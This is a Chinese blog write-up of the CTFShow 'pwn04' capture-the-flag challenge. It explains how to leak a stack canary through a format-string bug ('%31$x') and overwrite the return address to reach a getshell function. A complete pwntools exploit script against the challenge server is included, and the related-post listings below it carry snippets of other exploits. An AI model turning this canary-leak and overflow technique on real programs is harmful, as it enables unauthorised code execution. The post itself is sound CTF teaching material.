CTFShow pwn04

最新推荐文章于 2024-02-21 14:04:35 发布
最新推荐文章于 2024-02-21 14:04:35 发布
阅读量790 收藏 2
点赞数 2
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mintind/article/details/128159031
版权

checksec发现开启canary和NX保护
明显找vuln函数
在printf下断点
在这里插入图片描述

run之后随便输个值,看看栈的内容

请添加图片描述

打出canary的值看看
在这里插入图片描述在栈中找到canary和ret(返回地址)的位置

数出canary和printf的偏移是31(124/4),canary可以通过%31$x泄露

想让printf输出的内容用exploit地址覆盖掉返回地址,而且canary的值不变
那么构造的输入内容应该包括:

  1. 从字符串起点到canary共长100的填充
  2. canary
  3. 从canary到ret共长12的填充
    payload = b'a'*100 + p32(canary) + b'a'*12 + p32(getshell_addr)

exp:

from pwn import *

#p = process("./ex2")
p = remote("pwn.challenge.ctf.show", 28110)

p.recvuntil("Hacker!\n")    #记得接受那行Hacker!\n
p.sendline(b"%31$x")	#别改不会改
canary = int(p.recv(), 16)	#bytes转int
getshell_addr = 0x0804859B
payload = b'a'*100 + p32(canary) + b'a'*12 + p32(getshell_addr)
p.sendline(payload)
p.interactive()
Mintind
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
ctfshow pwn4
qq_39980610的博客
08-22 612
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
CTFshow-pwn入门-前置基础
akdelt的博客
01-15 523
esi 存储的是 msg 的地址,然后寄存器间接寻址把 msg 地址的内容拿出来给 eax 了。我们直接用 ida 看看 080490E8 地址上的值就行了。:运行此文件,将得到的字符串以ctfshow{xxxxx}提交。计算一下 eax 寄存器的值就行了(好臭的 flag,悲。所以我们把下载好的 elf 文件拿去执行即可。:寄存器间接寻址方式结束后eax寄存器的值为?: 立即寻址方式结束后eax寄存器的值为?:寄存器寻址方式结束后edx寄存器的值为?:直接寻址方式结束后ecx寄存器的值为?
pwn04
2301_80477504的博客
02-21 1337
ret2libc即控制函数的执行libc库中的函数,通常是返回至某个函数的plt处或者函数的具体位置即函数对应的got表项的内容。一般情况下,我们会选择执行故而此时我们需要知道system函数的地址。checksec(64位,开启了nx保护)进入ida分析,先查看main函数伪代码查看begin函数,没有异常,查看encrypt函数,发现了gets溢出并且由于程序本身并没有system/bin/sh的调用,放弃使用ret2text和ret2syscall的想法。
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9215
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
ctfshow pwn 04
A2247328295的博客
04-13 410
接下来在第一个黄框位置下断点和printf函数处下断点,该断点为了查看canary的值,然后在printf()函数处下断点,该断点是为了查看canary在printf()函数处偏移,然后直接run。格式化字符串漏洞简单来说就是,由于printf函数不安全的使用造成的,%n是不安全的,还有printf(a)直接输出字符串也是不安全的,我们可以通过该漏洞获取canary泄露。黄框的地方是重点,第一个黄框为canary的插入,第二个为printf()函数的调用,第三个为canary的检验。
PWN-PRACTICE-CTFSHOW-4
P1umH0的博客
01-16 664
PWN-PRACTICE-CTFSHOW-4BJDCTF2020-babyrouterBJDCTF2020-babystackBJDCTF2020-dizzyBJDCTF2020-encryptde stack BJDCTF2020-babyrouter 栈溢出,ret2libc # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.c
XCTF-简单题-pwn-004
Morphy_Amo的博客
12-09 604
CTF-pwn-新手区-004
CTFshow-pwn入门-Test_your_nc
T1ngSh0w的博客
06-17 1646
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5686
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。 浙江金融系
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 770
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
CTFshow卷王杯 | just pwn
rencvn的划水
03-06 638
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3385
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow pwn
zip471642048的博客
06-04 393
ctfshow pwn系列

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值